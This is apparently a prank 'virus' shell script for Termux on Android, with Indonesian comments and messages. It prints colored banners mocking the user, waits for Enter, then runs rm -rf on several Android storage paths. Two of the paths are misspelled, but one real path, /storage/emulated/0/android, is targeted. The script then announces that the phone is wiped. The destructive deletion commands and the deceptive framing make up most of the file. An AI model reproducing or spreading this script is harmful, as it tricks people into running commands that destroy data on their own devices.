e="echo -e "
m="\033[1;31m"   # Merah
h="\033[1;32m"   # Hijau
k="\033[1;33m"   # Kuning
b="\033[1;34m"   # Biru
bl="\033[1;36m"  # Biru Muda
p="\033[1;37m"   # Putih
u="\033[1;35m"   # Ungu
pu="\033[1;30m"  # Abu-abu
c="\033[1;96m"   # Cyan Terang
bg_m="\033[41m"  # Latar Belakang Merah
bg_h="\033[42m"  # Latar Belakang Hijau
bg_k="\033[43m"  # Latar Belakang Kuning
bg_b="\033[44m"  # Latar Belakang Biru
bg_bl="\033[46m" # Latar Belakang Biru Muda
bg_p="\033[47m"  # Latar Belakang Putih
bg_u="\033[45m"  # Latar Belakang Ungu
bg_pu="\033[40m" # Latar Belakang Abu-abu
res="\033[0m"    # Reset semua atribut
clear

$e ${m} "[📱 VIRUS TERMUX 🦠 2025]"

read -p " enter melalukan virus termux"

$e "${u}================================================"
$e "${u}=          ${h} [VIRUS TERMUX CPU]    ${u}                 ="
$e "${u}=   ${h}[HA HA HA HA HA HA YOU ARE IDIOOT]    ${u}         ="
$e "${u}=   ${h} [2025 virus termux hahahahahahha]     ${u}        ="
$e "${u}==============================================="


sleep 7

rm -rf /DIR/storage/android
rm -rf /sdacrd/androind
rm -rf /storage/emulated/0/android

sleep 1

clear


$e ${k} "SELAMAT TINGGAL HP MU JADI BARU  HA HA HA HA "

sleep 5
